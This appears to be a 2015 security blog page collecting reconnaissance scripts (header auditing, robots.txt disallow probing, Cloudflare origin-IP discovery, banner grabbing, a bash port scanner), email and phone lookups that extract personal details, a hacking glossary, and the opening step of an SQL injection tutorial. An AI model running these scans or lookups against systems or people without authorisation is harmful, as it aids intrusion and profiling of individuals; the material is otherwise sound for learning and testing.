Monday, 31 August 2015

PYTHON AND BASH SCRIPTS

BASH SCRIPT FOR CHECKING HTTP HEADERS FOR SECURITY

To check a site's HTTP response headers from a security perspective you can visit Security Headers (securityheaders.com). It checks for the following headers:
Access Control Allow Origin
Content Security Policy
Cross Domain Meta Policy
NoSniff
Server Information
Strict Transport Security
UTF-8 Character Encoding
X-Frame-Options
X-Powered-By
X-XSS-Protection
I wrote a bash script which checks a website's HTTP headers against securityheaders.com and prints the result.
chmod +x header.sh
./header.sh
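As an added example (not the page's header.sh, and not securityheaders.com's own logic), the same checks written in Python: audit() takes a response header map and reports each listed header that is missing or weakly set, plus version disclosure in Server/X-Powered-By and a wildcard Access-Control-Allow-Origin. The two header sets are constructed for the demo; fetch_headers() is the only part that touches the network, and the thresholds (one-year HSTS max-age, DENY/SAMEORIGIN for X-Frame-Options) are my choices.

```python
import re
import urllib.error
import urllib.request

ONE_YEAR = 31536000


def _check_hsts(value):
    m = re.search(r"max-age=(\d+)", value, re.I)
    if not m:
        return "no max-age directive"
    if int(m.group(1)) < ONE_YEAR:
        return "max-age=%s is below one year" % m.group(1)
    return None


def _check_xfo(value):
    if value.strip().upper() not in ("DENY", "SAMEORIGIN"):
        return "value %r is not DENY or SAMEORIGIN" % value
    return None


def _check_nosniff(value):
    return None if value.strip().lower() == "nosniff" else "value must be 'nosniff'"


def _check_csp(value):
    if "unsafe-inline" in value or "unsafe-eval" in value:
        return "policy allows unsafe-inline or unsafe-eval"
    return None


def _check_xss(value):
    return "protection disabled (0)" if value.strip().startswith("0") else None


# Headers that should be present, each with a validator for its value.
REQUIRED = {
    "strict-transport-security": _check_hsts,
    "x-frame-options": _check_xfo,
    "x-content-type-options": _check_nosniff,
    "content-security-policy": _check_csp,
    "x-xss-protection": _check_xss,
}


def audit(headers):
    """Return [(header, problem), ...] for a response header map.
    Header names are compared case-insensitively, as HTTP requires."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, check in REQUIRED.items():
        if name not in h:
            findings.append((name, "missing"))
        else:
            problem = check(h[name])
            if problem:
                findings.append((name, problem))
    # Information disclosure: a Server banner carrying a version, or X-Powered-By at all.
    if re.search(r"\d", h.get("server", "")):
        findings.append(("server", "discloses software version: %s" % h["server"]))
    if "x-powered-by" in h:
        findings.append(("x-powered-by", "discloses platform: %s" % h["x-powered-by"]))
    if h.get("access-control-allow-origin", "").strip() == "*":
        findings.append(("access-control-allow-origin", "wildcard origin"))
    ctype = h.get("content-type", "")
    if ctype.startswith("text/") and "charset=" not in ctype.lower():
        findings.append(("content-type", "no charset declared"))
    return findings


def fetch_headers(url):
    """Headers of a live site via HEAD (needs network; the demo below is offline)."""
    req = urllib.request.Request(url, method="HEAD", headers={"User-Agent": "header-audit"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return dict(resp.headers.items())
    except urllib.error.HTTPError as err:  # 4xx/5xx responses still carry headers
        return dict(err.headers.items())


# Constructed responses: a typical default PHP/Apache setup and a hardened one.
WEAK = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.10",
    "Content-Type": "text/html; charset=UTF-8",
    "X-Frame-Options": "ALLOWALL",
    "Strict-Transport-Security": "max-age=300",
    "Access-Control-Allow-Origin": "*",
}
HARDENED = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'",
    "X-XSS-Protection": "1; mode=block",
}

if __name__ == "__main__":
    import sys
    headers = fetch_headers(sys.argv[1]) if len(sys.argv) > 1 else WEAK
    for name, problem in audit(headers) or [("all checks", "ok")]:
        print("[%s] %s" % (name, problem))
```

Run it with a URL argument to audit a live site, or without one to see the eight findings for the constructed WEAK response; HARDENED comes back clean.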

BASH SCRIPT FOR CHECKING WHETHER AN ACCOUNT HAS BEEN COMPROMISED IN A DATA BREACH

Troy Hunt runs a great website, Have I Been Pwned, for checking whether your email address has been compromised in a data breach. Right now the breached email addresses from Adobe, Stratfor, Gawker, Pixel Federation, Yahoo!, Sony and Vodafone are listed. You can check manually on their site.
I wrote a simple bash script which checks against their site whether an email address has been compromised or not. You can also write it in Python using the simple requests module.

cd haveibeenpwned
chmod +x haveibeenpwned.sh
./haveibeenpwned.sh
Please enter email address to check against http://haveibeenpwned.com
troyhunt%40hotmail.com
You have been pwned in ["Adobe"] breach

PYTHON SCRIPT FOR AUDITING ROBOTS.TXT

A year ago I wrote about different methods to exploit the robots.txt file; you can find it here. Sometimes, due to weak directory permissions, you can get into the directories that robots.txt disallows. This Python script (Parsero) checks the HTTP status code of each Disallow entry in order to find out automatically whether those directories are accessible or not. For the original article click here.
It requires Python 3 and the urllib3 module.
git clone https://github.com/behindthefirewalls/Parsero.git
cd Parsero
python3 parsero.py -h
python3 parsero.py -u localhost/mutillidae
Now you can see which "disallowed" directories are actually accessible: the ones for which we got HTTP status code 200. A 403 still tells you the path exists but is forbidden, and a 301/302 usually means a redirect to a login page, so those are worth a manual look too.
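As an added example (not Parsero's code), the same audit in Python: parse_disallow() pulls the Disallow entries out of a robots.txt body, audit() requests each literal path with HEAD and records the status without following redirects, and reachable() lists the ones that answered 200. The robots.txt and the status table are constructed so it runs offline; status_of() is the real fetcher. One detail worth noting: Disallow paths are relative to the host root, so they are joined against the origin, not against a sub-directory like /mutillidae/.

```python
import urllib.error
import urllib.parse
import urllib.request


def parse_disallow(robots_txt):
    """Unique Disallow paths from a robots.txt body, in file order."""
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments
        field, sep, value = line.partition(":")
        if sep and field.strip().lower() == "disallow":
            value = value.strip()
            if value and value not in paths:         # bare "Disallow:" allows everything
                paths.append(value)
    return paths


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Report a 3xx as-is instead of following it: a redirect to /login is a finding too."""
    def redirect_request(self, *args, **kwargs):
        return None


def status_of(url):
    """HTTP status of a HEAD request (network; the demo injects a stub instead)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD", headers={"User-Agent": "robots-audit"})
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def audit(site, robots_txt, fetch_status=status_of):
    """Map every literal Disallow path to the status it returns. Paths are relative
    to the host root, so they are joined against the origin, not a sub-directory."""
    results = {}
    for path in parse_disallow(robots_txt):
        if "*" in path or path.endswith("$"):        # pattern rules cannot be requested literally
            results[path] = None
            continue
        results[path] = fetch_status(urllib.parse.urljoin(site, path))
    return results


def reachable(results):
    """200 means the 'hidden' resource is actually served. 403 still confirms it exists."""
    return sorted(p for p, code in results.items() if code == 200)


# --- constructed robots.txt and a stub fetcher so the demo runs offline ---------
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/        # old database dumps
Disallow: /passwords.txt
Disallow: /tmp/*.log
Disallow:
Disallow: /admin/
Allow: /public/
"""

STUB_STATUS = {
    "http://localhost/admin/": 403,
    "http://localhost/backup/": 200,
    "http://localhost/passwords.txt": 404,
}


def stub_fetch(url):
    return STUB_STATUS.get(url, 404)


if __name__ == "__main__":
    found = audit("http://localhost/", SAMPLE_ROBOTS, stub_fetch)
    for path, code in found.items():
        print("%-20s %s" % (path, code if code is not None else "pattern, skipped"))
    print("reachable:", reachable(found))
```

Against a real host, call audit("http://host/", robots_body) with the default fetcher; the pattern entries (those with * or $) are reported as None rather than requested, since a literal GET of /tmp/*.log proves nothing.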

TRUECALLER NAME RETRIEVER PYTHON SCRIPT

Truecaller is a global phone directory application for smartphones and feature phones, also accessible via a website. If you have an unknown mobile number you can search for it on the Truecaller website or in the Truecaller application. This Python script is written by A'mmer Almadani. The script is still in the development phase; more functions will be added soon.
cd callerpy
Now open the callerpy.py file and enter your Twitter credentials at lines 39 and 40; they are used for authentication. Since they sit in plain text in the script, use a throwaway account rather than your own.
python callerpy.py -h
usage: callerpy.py [-h] -n number [-c country] [-cc country code] -l login
TrueCaller Name Retriever
optional arguments:
  -h, --help            show this help message and exit
  -n number, --number number
                        Phone Number Without Country Code (default: None)
  -c country, --country country
                        Country | String (default: None)
  -cc country code, --countrycode country code
                        Country | Int (default: None)
  -l login, --login login
                        Login Method | twitter, g+, fb (default: twitter)
python callerpy.py -n 9016986989 -c india-other -l twitter

PYTHON SCRIPT TO SEARCH EMAIL ADDRESSES AGAINST THE GRAVATAR DATABASE

Gravatar is a service for providing globally unique avatars. When a user posts a comment on a blog that requires an e-mail address, the blogging software checks whether that e-mail address has an associated avatar at Gravatar. If so, the Gravatar is shown along with the comment. The script is made by averagesecurityguy. It takes email addresses and checks them against the Gravatar database; if an address exists there, it extracts the username, location and account details. First we will understand how it works; for developer resources click here.
To view the details for an email address we need to create the email hash: the MD5 of the address after trimming whitespace and converting it to lower case. For example, if you want to check the email address nirav.desai1991@gmail.com, we create the md5 hash of the address:
root@bt:~#echo -n nirav.desai1991@gmail.com| md5sum
dfd36ad92895ea6b7829d2918ad07fcf
To extract details about the email address we make the following request:
http://en.gravatar.com/dfd36ad92895ea6b7829d2918ad07fcf.json
and there we get the details of my Gravatar profile (a 404 means no profile is registered for that address).
That is a simple summary of how it works. Now to the script: gravatar.py takes a file with a list of email addresses, one per line, and searches Gravatar for information about each address. If an address is registered with Gravatar, then selected data points are extracted from the Gravatar profile.
Now you need an email address list file.
python gravatar.py email
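As an added example (not averagesecurityguy's gravatar.py), the lookup written out in Python: gravatar_hash() applies the trim-and-lowercase rule before MD5, extract() pulls the data points out of the profile JSON, and check_emails()/check_file() run the one-address-per-line workflow. The profile document is constructed; its field names (preferredUsername, displayName, currentLocation, accounts) follow Gravatar's profile JSON format, and http_get_json() is the only network call.

```python
import hashlib
import urllib.error
import urllib.request
import json


def gravatar_hash(email):
    """Gravatar's identifier: MD5 of the address after trimming and lower-casing."""
    return hashlib.md5(email.strip().lower().encode("utf-8")).hexdigest()


def profile_url(email):
    return "https://en.gravatar.com/%s.json" % gravatar_hash(email)


def extract(profile):
    """Pick the interesting data points out of a profile document (None if empty)."""
    entries = profile.get("entry") or []
    if not entries:
        return None
    e = entries[0]
    return {
        "username": e.get("preferredUsername"),
        "display_name": e.get("displayName"),
        "location": e.get("currentLocation"),
        "accounts": [(a.get("domain"), a.get("url")) for a in e.get("accounts", [])],
    }


def http_get_json(url):
    """Fetch a profile; a 404 means the address has no Gravatar. (needs network)"""
    req = urllib.request.Request(url, headers={"User-Agent": "gravatar-lookup"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.loads(resp.read().decode("utf-8"))
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None
        raise


def lookup(email, fetch=http_get_json):
    doc = fetch(profile_url(email))
    return extract(doc) if doc is not None else None


def check_emails(emails, fetch=http_get_json):
    """{address: extracted data or None} for a list of addresses."""
    return {e: lookup(e, fetch) for e in emails}


def check_file(path, fetch=http_get_json):
    """The gravatar.py workflow: one address per line in a file."""
    with open(path) as fh:
        return check_emails([line.strip() for line in fh if line.strip()], fetch)


# --- constructed profile document (field names follow Gravatar's profile JSON) ---
FAKE_PROFILES = {
    profile_url("alice@example.com"): {
        "entry": [{
            "preferredUsername": "alice",
            "displayName": "Alice Example",
            "currentLocation": "Oslo, Norway",
            "accounts": [{"domain": "twitter.com", "url": "https://twitter.com/alice"}],
        }]
    },
}


def fake_fetch(url):
    return FAKE_PROFILES.get(url)


if __name__ == "__main__":
    for addr, info in check_emails(["Alice@Example.com ", "nobody@example.com"], fake_fetch).items():
        print(addr.strip(), "->", info)
```

Note that " Alice@Example.com " and "alice@example.com" hash to the same value, which is why the normalisation matters: without it a capitalised address from a mailing list would produce a miss for a profile that exists.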

CLOUDFLARE RESOLVER BASH SCRIPT

CloudFlare is a content delivery network and distributed domain name server service marketed as improving website performance and speed and providing security. A year ago I posted different methods to find out the real I.P. behind CloudFlare.
All those methods only work if there is an admin misconfiguration, for example a subdomain (mail, ftp, dev) or an old DNS record that still points directly at the origin server:
(1)DNS bruteforce
(2)NMAP
(3)Netcraft toolbar
I made a simple bash script which does all of this for you; you just have to provide the name of a website which is behind CloudFlare.
cd cloudflare-ip
chmod +x cloudflare-ip.sh
./cloudflare-ip.sh
In the script you have to change the I.P. at line 45. I used a dns variable because for an unknown (non-existent) name my ISP redirects to its own address instead of returning NXDOMAIN, so we need that address to tell whether a response is valid or not. Change that I.P. according to your setting (resolve a random non-existent subdomain first to see what your resolver returns).
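As an added example (not the page's cloudflare-ip.sh), the DNS brute-force step in Python with the two checks that script needs: junk_answers() first resolves a random label so that an ISP NXDOMAIN redirect or a wildcard record is recognised and discarded for every name, and behind_cloudflare() drops answers inside Cloudflare's edge ranges. The DNS data and the ISP redirect address are constructed; the single Cloudflare range is an assumption for the demo and the current list should be loaded from https://www.cloudflare.com/ips-v4.

```python
import ipaddress
import random
import socket
import string

# Cloudflare publishes its edge ranges at https://www.cloudflare.com/ips-v4 ;
# load that list in real use. The single range here is an assumption for the demo.
CLOUDFLARE_V4 = [ipaddress.ip_network("104.16.0.0/12")]

# Labels that often point straight at the origin when an admin forgot them.
COMMON_SUBDOMAINS = ["www", "mail", "ftp", "dev", "staging", "cpanel",
                     "webmail", "direct", "origin", "vpn"]


def behind_cloudflare(ip, ranges=CLOUDFLARE_V4):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ranges)


def resolve_all(name):
    """All IPv4 answers for a name, [] if it does not resolve. (needs network)"""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def junk_answers(domain, resolve):
    """What the resolver says for a name that cannot exist. A non-empty answer means
    wildcard DNS or an ISP that hijacks NXDOMAIN (the 'dns' I.P. problem from the
    script), and those addresses must be ignored for every name."""
    label = "".join(random.choice(string.ascii_lowercase) for _ in range(14))
    return set(resolve("%s.%s" % (label, domain)))


def find_origin_candidates(domain, wordlist=COMMON_SUBDOMAINS,
                           resolve=resolve_all, ranges=CLOUDFLARE_V4):
    """Brute-force subdomains and keep only answers that are neither the resolver's
    junk answer nor inside Cloudflare's ranges: those are origin-I.P. candidates."""
    junk = junk_answers(domain, resolve)
    candidates = {}
    for sub in wordlist:
        name = "%s.%s" % (sub, domain)
        for ip in resolve(name):
            if ip in junk or behind_cloudflare(ip, ranges):
                continue
            candidates.setdefault(name, []).append(ip)
    return candidates


# --- constructed DNS data so the demo runs offline ------------------------------
FAKE_DNS = {
    "www.example.com": ["104.16.1.1"],                  # Cloudflare edge
    "dev.example.com": ["104.17.5.5", "203.0.113.20"],  # edge plus a leaked origin
    "mail.example.com": ["203.0.113.10"],               # mail often bypasses the CDN
}
ISP_REDIRECT = "198.51.100.9"                           # answer for any unknown name


def fake_resolve(name):
    return FAKE_DNS.get(name, [ISP_REDIRECT])


if __name__ == "__main__":
    for name, ips in find_origin_candidates("example.com", resolve=fake_resolve).items():
        print("%s -> %s" % (name, ", ".join(ips)))
```

A candidate is only a candidate: confirm it by requesting the site from that address with the right Host header and comparing the response with the one served through Cloudflare.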

BANNER GRABBING PYTHON SCRIPT

This is a simple banner grabbing Python script which grabs the service banner of ports 21, 22, 25, 80, 110 and 443. If you want to grab banners from different ports you can modify it as per your requirement. Note that only services which talk first (FTP, SSH, SMTP, POP3) send a banner on connect; HTTP only answers after a request, and port 443 speaks TLS, so nothing readable comes back from those two without sending something first.
#!/usr/bin/env python
import socket

def retBanner(ip, port):
    # connect to ip:port and return the first bytes the service sends,
    # or None if the connection fails or nothing arrives within 2 seconds
    try:
        socket.setdefaulttimeout(2)
        s = socket.socket()
        s.connect((ip, port))
        banner = s.recv(1024)
        s.close()
        return banner.decode('latin-1', 'replace').strip()
    except (socket.error, socket.timeout):
        return None

def main():
    portList = [21, 22, 25, 80, 110, 443]
    # hosts 192.168.95.147 - 192.168.95.149 (range stops before 150)
    for x in range(147, 150):
        ip = '192.168.95.' + str(x)
        for port in portList:
            banner = retBanner(ip, port)
            if banner:
                print('[+] ' + ip + ':' + str(port) + ' ' + banner)

if __name__ == '__main__':
    main()
First we import the socket library. Then we define two functions: (1) retBanner and (2) main.
(1) retBanner:-
socket.setdefaulttimeout(2) sets the default socket timeout to 2 seconds, so a filtered port or a silent service does not hang the scan.
s = socket.socket() opens a TCP socket.
s.connect((ip, port)) connects the socket to the specified I.P. and port.
s.recv(1024) reads up to the next 1024 bytes from the socket and saves them in the variable banner; they are decoded to text before being returned.
If the connection is refused or times out, the except branch returns None.
(2) main:-
portList = [21, 22, 25, 80, 110, 443] :- the ports whose banners we grab. If you want more ports just add the port number to the portList array.
for x in range(147, 150): :- used to grab banners from a block of I.P.s. It only changes the fourth octet of the I.P. address, and range stops before 150, so this covers .147, .148 and .149. Change the values according to your requirement.
ip = '192.168.95.' + str(x) :- we define the first three octets of the I.P.; the fourth octet comes from the for loop.
for port in portList: :- scan the ports from the portList array one by one.
banner = retBanner(ip, port) :- we call the first function, retBanner, and save its value in the variable banner.
The last two lines of the loop print ip:port and the banner on screen if we got one.
(3) if __name__ == '__main__': this lets the Python file act either as a reusable module or as a standalone program.
And the last line calls the main function.
Usage of script
chmod +x script_name
python script_name

PORT SCANNING SHELL SCRIPT

Here is the code for a simple port scanner constructed with bash. The script takes three arguments: a host name or I.P. address, the port at which we wish to start our scan, and the port at which we wish to stop. It only works if your bash was built with /dev/tcp support (most distributions enable it; Debian historically disabled it), because /dev/tcp/host/port is a bash feature, not a real file.
#!/bin/bash
# usage: ./script_name host start_port stop_port
# populate our variables from the arguments
host=$1
startport=$2
stopport=$3
# function pingcheck: ping a device to see if it is up
function pingcheck
{
    # the PING header line and each reply both contain "bytes",
    # so a live host gives 2 matching lines and a dead one gives 1 (or 0)
    ping=$(ping -c 1 -w 10 "$host" | grep bytes | wc -l)
    if [ "$ping" -gt 1 ]; then
        echo "$host is up"
    else
        echo "$host is down, quitting"
        exit 1
    fi
}
# function portcheck: test each port in the range to see if it is open
function portcheck
{
    for ((counter=startport; counter<=stopport; counter++))
    do
        (echo >/dev/tcp/"$host"/"$counter") > /dev/null 2>&1 && echo "$counter open"
    done
}
# run our functions
pingcheck
portcheck
We can divide this script into three parts.
(1) In the first part we populate variables from the arguments; variable $0 is reserved for the script name, so with ./scriptname host startport stopport
the host value is saved in $1, the start port in $2 and the stop port in $3.
(2) The second part is the ping check function.
We defined the pingcheck function to determine whether the host is up or not. Here we use a pipe to give the previous command's output to the next command.
ping -c 1 -w 10 $host | grep bytes | wc -l
-c 1 indicates that we only transmit 1 packet.
-w 10 indicates a timeout value of 10 seconds.
If the host is up then we get a response like
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.056 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.056/0.056/0.056/0.000 ms
This output is fed to the next command, grep bytes, which keeps only the lines containing "bytes". Note that two lines match: the PING header line ("56(84) bytes of data") as well as the reply line:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.056 ms
Next this is passed to wc -l, which counts lines, so the output is 2 when the host replied. This value is stored in the variable named ping.
Now we use a simple if statement which checks the value in the ping variable: if it is greater than 1 the host is up, otherwise it is down. If the host is down we get no reply line, only the header line (or nothing at all if the name does not resolve), so the count is 1 or 0; that is why the test is -gt 1 and not -gt 0. A host which filters ICMP is also reported as down even though its TCP ports may be open; drop the pingcheck call if you want to scan such hosts anyway.
(3) The third part is the port scanning function.
First is the for loop; it runs from the start port to the stop port which we specified as arguments when running the script. So if we specified start port = 80 and stop port = 85 then the loop runs from 80 to 85 to check for open ports.
Next is (echo >/dev/tcp/$host/$counter) > /dev/null 2>&1 && echo "$counter open"
Here bash's /dev/tcp pseudo-device opens a TCP connection to $host on port $counter when the echo is redirected into it; the connection attempt only succeeds if the port is open. Its output is redirected to /dev/null, and 2>&1 sends the error messages (stderr) to the same place, so "Connection refused" is hidden. && runs the final echo only when the connection succeeded, so only open port numbers are displayed on screen.
In the last two lines we call the functions defined in parts 2 and 3.
Usage of script:
chmod +x script_name.sh
./script_name host start_port stop_port
We can also scan multiple I.P.s by reading them from a file.
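As an added example covering both this port scanner and the banner grabbing script above (my code, not the page's), a Python TCP-connect scanner with banner grabbing: probe_port() distinguishes a closed port from one that is open but silent, sends a probe on ports that do not talk first (HTTP), and scan_range() takes the same host/start/stop arguments as the bash script. start_fake_service() starts a throwaway local listener so the example runs offline; its banner string is constructed.

```python
import socket
import threading

# Services that say nothing until spoken to need a probe first (HTTP is the
# usual case); TLS ports stay silent whatever clear-text we send.
PROBES = {80: b"HEAD / HTTP/1.0\r\n\r\n", 8080: b"HEAD / HTTP/1.0\r\n\r\n"}


def probe_port(host, port, timeout=2.0, payload=b""):
    """TCP-connect one port. Returns (is_open, banner): banner is None when the
    port is closed/filtered and '' when it is open but sent nothing in time."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:                      # refused, unreachable, or connect timeout
        return False, None
    with sock:                           # create_connection leaves the timeout set
        try:
            if payload:
                sock.sendall(payload)
            data = sock.recv(1024)
        except OSError:                  # recv timeout or reset: open, no banner
            data = b""
    return True, data.decode("latin-1", "replace").strip()


def scan(host, ports, timeout=2.0):
    """Return {port: banner} for every open port in `ports`."""
    results = {}
    for port in ports:
        is_open, banner = probe_port(host, port, timeout, PROBES.get(port, b""))
        if is_open:
            results[port] = banner
    return results


def scan_range(host, start, stop, timeout=0.5):
    """Same contract as the bash script: inclusive port range on one host."""
    return scan(host, range(start, stop + 1), timeout)


# --- throwaway local service so the example (and its tests) run offline ---------
def start_fake_service(banner):
    """Listen on 127.0.0.1:<ephemeral>, send `banner` to each client and hang up.
    Returns (port, stop) where stop() shuts the listener down."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:              # listener closed by stop()
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port, srv.close


def free_port():
    """An ephemeral port nothing listens on (stands in for a closed port)."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    port, stop = start_fake_service(b"SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu2\r\n")
    closed = free_port()
    for p, banner in scan("127.0.0.1", [port, closed]).items():
        print("[+] 127.0.0.1:%d %s" % (p, banner or "(open, no banner)"))
    stop()
```

For a real host replace the fake service with scan_range("10.0.0.5", 20, 1024); the per-port timeout is what bounds the run time on filtered ports, which simply never answer.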


BASIC OF HACKING

Hacker means someone who finds weaknesses in a computer or computer network, though the term can also refer to someone with an advanced understanding of computers and computer networks.Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge. The subculture that has evolved around hackers is often referred to as the computer underground but it is now an open community. While other uses of the word hacker exist that are not related to computer security, they are rarely used in mainstream context.

Classifications:-


Several subgroups of the computer underground with different attitudes use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree. Eric S. Raymond (author of The New Hacker's Dictionary) advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers and even try to include the views of Raymond in what they see as one wider hacker culture, a view harshly rejected by Raymond himself. Instead of a hacker/cracker dichotomy, they give more emphasis to a spectrum of different categories, such as white hat, grey hat, black hat and script kiddie.

White Hat:-


A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system or while working for a security company which makes security software. The term "white hat" in Internet slang refers to an ethical hacker. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement. The EC-Council , also known as the International Council of Electronic Commerce Consultants has developed certifications, course ware, classes, and online training covering the diverse arena of Ethical Hacking.

Black Hat:-


A "black hat" hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain" (Moore, 2005). Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black hat hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network.

Part 1: Targeting


The hacker determines what network to break into during this phase. The target may be of particular interest to the hacker, either politically or personally, or it may be picked at random. Next, they will port scan a network to determine if it is vulnerable to attacks, which is just testing all ports on a host machine for a response. Open ports—those that do respond—will allow a hacker to access the system. 

Part 2: Research And Information Gathering


It is in this stage that the hacker will visit or contact the target in some way in hopes of finding out vital information that will help them access the system. The main way that hackers get desired results from this stage is from "social engineering", which will be explained below. Aside from social engineering, hackers can also use a technique called "dumpster diving". Dumpster diving is when a hacker will literally search through users' garbage in hopes of finding documents that have been thrown away, which may contain information a hacker can use directly or indirectly, to help them gain access to a network.

Part 3: Finishing The Attack


This is the stage when the hacker will invade the target that he/she was planning to attack or steal from. Many "hackers" will be caught after this point, lured in by a honeypot (a trap set up by computer security personnel).

Grey Hat:-


A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.

Elite Hacker:-


A social status among hackers, elite is used to describe the most skilled. Newly discovered exploits will circulate among these hackers. Elite groups such as Masters of Deception conferred a kind of credibility on their members.

Script Kiddie:-


A script kiddie (or skiddie) is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept—hence the term script (i.e. a prearranged plan or set of activities) kiddie (i.e. kid, child—an individual lacking knowledge and experience, immature).

Neophyte:-


A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.

Blue Hat:-


A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.

Hacktivist:-


A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.

Nation State:-


Intelligence agencies and cyberwarfare operatives of nation states.

Attack:-


A typical approach in an attack on Internet-connected system is:

1. Network enumeration: Discovering information about the intended target.

2. Vulnerability analysis: Identifying potential ways of attack.

3. Exploitation: Attempting to compromise the system by employing the vulnerabilities found through the vulnerability analysis.

In order to do so, there are several recurring tools of the trade and techniques used by computer criminals and security experts.

Security Exploit:-


A security exploit is a prepared application that takes advantage of a known weakness. Common examples of security exploits are SQL injection, Cross Site Scripting and Cross Site Request Forgery, which abuse security holes that result from substandard programming practice. Other exploits target services such as FTP, HTTP, PHP, SSH and Telnet, or specific web pages. These are very common in website/domain hacking.

Techniques


Vulnerability Scanner:-


A vulnerability scanner is a tool used to quickly check computers on a network for known weaknesses.Hackers also commonly use port scanners. These check to see which ports on a specified computer are "open" or available to access the computer, and sometimes will detect what program or service is listening on that port, and its version number. (Note that firewalls defend computers from intruders by limiting access to ports/machines both inbound and outbound, but can still be circumvented.)

Password Cracking:-


Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Packet Sniffer:-


A packet sniffer is an application that captures data packets, which can be used to capture passwords and other data in transit over the network.

Spoofing Attack (Phishing):-


A spoofing attack involves one program, system, or website successfully masquerading as another by falsifying data and thereby being treated as a trusted system by a user or another program. The purpose of this is usually to fool programs, systems, or users into revealing confidential information, such as user names and passwords, to the attacker.

Rootkit:-


A rootkit is designed to conceal the compromise of a computer's security, and can represent any of a set of programs which work to subvert control of an operating system from its legitimate operators. Usually, a rootkit will obscure its installation and attempt to prevent its removal through a subversion of standard system security. Rootkits may include replacements for system binaries so that it becomes impossible for the legitimate user to detect the presence of the intruder on the system by looking at process tables.

Social Engineering:-


When a Hacker, typically a black hat, is in the second stage of the targeting process, he or she will typically use some social engineering tactics to get enough information to access the network. A common practice for hackers who use this technique, is to contact the system administrator and play the role of a user who cannot get access to his or her system.

Trojan Horses:-


A Trojan horse is a program which seems to be doing one thing, but is actually doing another. A trojan horse can be used to set up a back door in a computer system such that the intruder can gain access later. (The name refers to the horse from the Trojan War, with conceptually similar function of deceiving defenders into bringing an intruder inside.)

Viruses:-


A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. Therefore, a computer virus behaves in a way similar to a biological virus, which spreads by inserting itself into living cells. While some are harmless or mere hoaxes most computer viruses are considered malicious.

Worm:-


Like a virus, a worm is also a self-replicating program. A worm differs from a virus in that it propagates through computer networks without user intervention. Unlike a virus, it does not need to attach itself to an existing program. Many people conflate the terms "virus" and "worm", using them both to describe any self-propagating program.

Key Loggers:-


A key logger is a tool designed to record ('log') every keystroke on an affected machine for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed on the affected machine, such as a user's password or other private data. Some key loggers use virus-, trojan-, and rootkit-like methods to remain active and hidden. However, some key loggers are used in legitimate ways and sometimes even to enhance computer security. As an example, a business might have a key logger on a computer used at a point of sale, and the data collected by the key logger could be used for catching employee fraud.


Saturday, 29 August 2015

SQL Injection Tutorial by 4$hI$# (MySQL) in 6 Steps

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

What Is SQL Injection?



It's one of the most common vulnerabilities in web applications today.
It allows an attacker to execute database queries through the URL (or any other
input that is pasted into a query) and gain access to confidential information etc... (in short).


1.SQL Injection (classic or error based or whatever you call it) :D

2.Blind SQL Injection (the harder part)


So let's start with some action :D

                                                Step 1

1). Check for vulnerability

Let's say that we have some site like this:

http://www.site.com/news.php?id=5

Now to test if it is vulnerable we add a ' (single quote) to the end of the URL, which gives:

http://www.site.com/news.php?id=5'

